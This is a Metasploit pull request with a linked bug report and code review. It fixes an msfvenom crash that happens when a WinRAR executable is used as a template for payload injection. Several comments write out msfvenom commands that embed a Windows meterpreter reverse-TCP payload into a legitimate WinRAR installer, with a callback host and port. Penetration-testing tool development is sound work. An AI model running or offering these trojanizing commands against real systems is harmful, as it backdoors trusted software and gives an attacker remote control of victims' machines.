### PR TITLE
Ensure all EXE template files have exports before attempting to use them as templates

### LINKED ISSUE #9867: undefined method 'map' for nil:NilClass
## Steps to reproduce
exe file is winrar.exe for www.winrar.com.cn the newest
use command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.133 LPORT=8090 -x winrar.exe -k -f exe -o winrar_new.exe

kali linuxe 2018 1a  x86 and x64  the problem all occured
## Expected behavior

the payload is added to the exe file 

## Current behavior

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoders or badchars specified, outputing raw payload
Payload size:333 bytes
Error: undefined method 'map' for nil:NilClass
Did you mean? tap

### Metasploit version
4.16-30 dev

### I installed Metasploit with:
Kali package via apt

### OS
kali linux 2018.1 x86 and x64

if I don't use the command -f exe the command can run successfully however, the payload is not add to the exe I want to add it on the exe, so please tell me how to solve the problem

### PR DESCRIPTION
**Pull request by gwillcox-r7**
Fixes #9867 

This fixes an error whereby if a user specified a template EXE via `msfvenom`'s `-x` option, and that template EXE did not have any exports, one would get a `nil` pointer dereference error. The fixes are applied to two files, `segement_appender.rb` and `segment_injector.rb`, as `segment_injector.rb` will be used if the `-k` option of `msfvenom` is used in conjunction with its `-x` option.

I also noticed that one of the files did not check to see if the file has WarBird enabled or not despite us performing pretty similar operations, so I also added this check in to ensure the two functions match each other in behavior and so we don't run into unexpected errors.

## Verification

List the steps needed to make sure this thing works

- [x] Download winrar-x64-000.exe from https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-600.exe
- [x] **Run**: `./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.133 LPORT=8090 -f exe -x winrar-x64-600.exe -k -o winrar_new.exe`
- [ ] **Verify** that before the patch this command would fail with a `nil` error.
- [x] **Verify** that after the patch this command now fails with `Error: The template file doesn't have any exports to inject into!`
- [ ] Document any issues encountered.

### CODE REVIEW

File: lib/msf/core/exe/segment_appender.rb [hunk 1]
```diff
@@ -16,6 +16,12 @@ def payload_stub(prefix)
     def generate_pe
       # Copy our Template into a new PE
       pe_orig = Metasm::PE.decode_file(template)
+      if is_warbird?(pe_orig)
+        raise RuntimeError, "The template to inject to appears to have license verification (warbird)"
+      end
+      if pe_orig.export && pe_orig.export.num_exports == 0
+        raise RuntimeError, "The template file doesn't have any exports to inject into!"
+      end
```
Comment (adfoster-r7) [inline lib/msf/core/exe/segment_appender.rb:24]: @gwillcox-r7 You'll be more experience with PE files than me, but I imagined for appending to a file without any sections then this code should still gracefully add a new section? 🤔

Comment (gwillcox-r7) [reply lib/msf/core/exe/segment_appender.rb:24]: @adfoster-r7 Not sure why you are referring to sections here? Unless you mean if a PE file doesn't have a `.exports` section or something similar than we should create one, in which case I would agree however this would involve adding a new feature. For now this is intended more as a patch until such features can be added.

File: lib/msf/core/exe/segment_appender.rb [hunk 2]
```diff
@@ -16,6 +16,12 @@ def payload_stub(prefix)
     def generate_pe
       # Copy our Template into a new PE
       pe_orig = Metasm::PE.decode_file(template)
+      if is_warbird?(pe_orig)
+        raise RuntimeError, "The template to inject to appears to have license verification (warbird)"
+      end
+      if pe_orig.export && pe_orig.export.num_exports == 0
```
Comment (cdelafuente-r7) [inline lib/msf/core/exe/segment_appender.rb:22]: I'm not sure we should abort if there is no export in the template binary. In my understanding, it is not a requirement to generate PE's from templates. I believe this is a Metasm issue in this particular case.

This template binary (`winrar-x64-600.exe`) does have an export directory but with no exported functions:

Screen Shot 2021-02-02 at 19 32 07

When decoding the export directory, Metasm only initializes the `@exports` instance variable if the AddressOfFunctions (`@func_p`) is not nil ([here](https://github.com/jjyg/metasm/blob/master/metasm/exe_format/coff_decode.rb#L83)). Since it is nil for this particular binary, `@exports` is not initialized and, therefore, is also `nil`.

I fixed the issue by moving the `@exports` initialization outside of the `if` block:
```ruby
			@exports = []
			if coff.sect_at_rva(@func_p)\
				addrs = []
				@num_exports.times { addrs << coff.decode_word }
                                 ...
```

```
❯ ./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.133 LPORT=8090 -f exe -x winrar-x64-600.exe -k -o winrar_new.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 625664 bytes
Saved as: winrar_new.exe
```

That said, I'm not sure if this fix is enough. This might need more investigation to make sure it doesn't break anything.

File: lib/msf/core/exe/segment_appender.rb [hunk 3]
```diff
@@ -16,6 +16,12 @@ def payload_stub(prefix)
     def generate_pe
       # Copy our Template into a new PE
       pe_orig = Metasm::PE.decode_file(template)
+      if is_warbird?(pe_orig)
```
Comment (cdelafuente-r7) [inline lib/msf/core/exe/segment_appender.rb:19]: In my understanding, `warbird` (license verification) only applies to `SegmentInjector` (see this [PR](https://github.com/rapid7/metasploit-framework/pull/5660) and [issue](https://github.com/rapid7/metasploit-framework/issues/4380)).
Did you experienced issues with `SegmentAppender` and binaries with `warbird`?

Comment (gwillcox-r7) [reply lib/msf/core/exe/segment_appender.rb:19]: So my thought here was that `SegementAppender` is called if the `-k` flag is also supplied. If just `-x` is used then `SegmentInjector` is used. Since the two could technically be called on the same binary my thought was that similar checks should be performed. I also thought this would be logical given that the code seems to be fairly similar for both.

TLDR: This change was more based off of some assumptions from observations I found whilst doing this PR and I haven't tested it fully. If you feel this doesn't belong here then feel free to remove it.

File: lib/msf/core/exe/segment_appender.rb (hunk 2 above)
Comment (adfoster-r7) [reply lib/msf/core/exe/segment_appender.rb:22]: This was my first thoughts too; I wondered if there were any semantic differences between exports being `nil` versus an empty array? i.e. Are there existing code assumptions around `nil` being a possible value that this code in isolation doesn't take into consideration?

File: lib/msf/core/exe/segment_appender.rb (hunk 3 above)
Comment (cdelafuente-r7) [reply lib/msf/core/exe/segment_appender.rb:19]: I haven't tested it but, in my understanding, it looks like it is the way around. `SegmentInjector` is used when the `-k` flag is supplied. Without this flag, `SegmentAppender` is used.

The `generate_pe` method has a different behavior in each class:
- `SegmentAppender::generate_pe` will add the payload to a new section and add it to the binary. It also updates the entry point to jump to this new section.
- `SegmentInjector::generate_pe` will replace the original `.text` section with the payload and do some magic to execute it. This is probably why `warbird` protection is not compatible with this kind of injection.

Comment (gwillcox-r7) [reply lib/msf/core/exe/segment_appender.rb:19]: Makes sense, happy to undo this edit based on what you have said.

File: lib/msf/core/exe/segment_appender.rb (hunk 2 above)
Comment (gwillcox-r7) [reply lib/msf/core/exe/segment_appender.rb:22]: Well I suppose this really depends on if the code is calling `.empty?` on `@exports`. If it is, then `nil` won't work here. Also `nil` is not considered equal to `[]` in Ruby so I'd be concerned about its treatment even if `.empty?` wasn't being used.

**Comment by smcintyre-r7** [comment]
After looking into this a bit more, I think we can fix the underlying issue in metasm because it is a Rapid7 project. I opened rapid7/metasm#1 which normalizes `@exports` to an empty array for the purposes of the encode operation. With that change in place, the original `msfvenom` commands actually generate executables instead of throwing errors (handled or otherwise).

**Comment by smcintyre-r7** [comment]
How would we feel about moving this forward with a combined approach of fixing the issue in metasm and retaining the guard clause in Metasploit for the `SegmentInjector` to prevent non-functioning executables from being generated?

That would allow the `SegmentAppender` (**no** `-k` flag) to run and create a functioning binary.

The metasm fix I proposed sounds very similar to what @cdelafuente-r7 was describing but is a bit more conservative IMHO because the changes are isolated within the method that requires them (`ExportDirectory#encode`), thereby reducing the possibility of breaking things elsewhere within metasm.

**Comment by gwillcox-r7** [comment]
@smcintyre-r7 Sounds like that would be the appropriate way to approach this so I'd be happy to go with that. The way I was doing things was hacky as it is and I agree it could use improvement. I'd be interested to see where the changes would be proposed but if you want me to close down this issue and use it as a tracker and then we create two separate PRs to address each of the issues you mentioned I'd be happy to do that.

**Comment by gwillcox-r7** [comment]
After talking with Spencer more we agreed that the WarBird change should be removed, along with the `SegmentAppender` change, whilst keeping the `SegmentInjector` change since we currently don't have a proper fix for that, and it would be nice to at least alert users that they may be using the options incorrectly vs failing silently. Long term it would be nice to fix `SegmentInjector` to support EXEs but this will likely require a separate PR along with more work and investigation to provide a full fix.

File: lib/msf/core/exe/segment_appender.rb (hunk 3 above)
Comment (gwillcox-r7) [reply lib/msf/core/exe/segment_appender.rb:19]: Will be undone with next commit, sorry about that!

File: lib/msf/core/exe/segment_appender.rb (hunk 2 above)
Comment (gwillcox-r7) [reply lib/msf/core/exe/segment_appender.rb:22]: Spencer has since fixed this issue with https://github.com/rapid7/metasm/pull/1 which is awaiting updates here and then it will be landed. Closing this as resolved as we have a separate PR to fix this issue and I'll be removing these changes from the file soon.

Comment (gwillcox-r7) [reply lib/msf/core/exe/segment_appender.rb]: Marking as fixed due to above reason and this edit being removed with https://github.com/rapid7/metasploit-framework/pull/14683/commits/bffbf4601735595cddddad35b2d848455ad68854.

File: lib/msf/core/exe/segment_appender.rb (hunk 1 above)
Comment (gwillcox-r7) [reply lib/msf/core/exe/segment_appender.rb]: Marking as resolved since this change was undone with https://github.com/rapid7/metasploit-framework/pull/14683/commits/bffbf4601735595cddddad35b2d848455ad68854 and there is now a separate PR at https://github.com/rapid7/metasm/pull/1 from Spencer to resolve this issue properly at its source within Metasm.

**Comment by gwillcox-r7** [comment]
Jeffery landed https://github.com/rapid7/metasm/pull/1 so going to make a quick change to this PR so we also bump the `metasm` gem appropriately and will update the title accordingly, then this should be good to land as we tested this whilst we were testing https://github.com/rapid7/metasm/pull/1 and found that everything is working fine.

**Comment by smcintyre-r7** [comment]
Confirmed with this change in place, the exception is being raised when the executable is incompatible with the selected injection techique.

```
./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.133 LPORT=8090 -f exe -x ~/Downloads/winrar-x64-600.exe -k -o winrar_new.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Error: The template file doesn't have any exports to inject into!
```

**Comment by smcintyre-r7** [comment]
# Release Notes
This replaces a cryptic exception raised by msfvenom when an incompatible EXE template file is used with a specific injection technique. The new exception validate whether the EXE is compatible and reports the reason it is not so the user can more easily understand the problem.
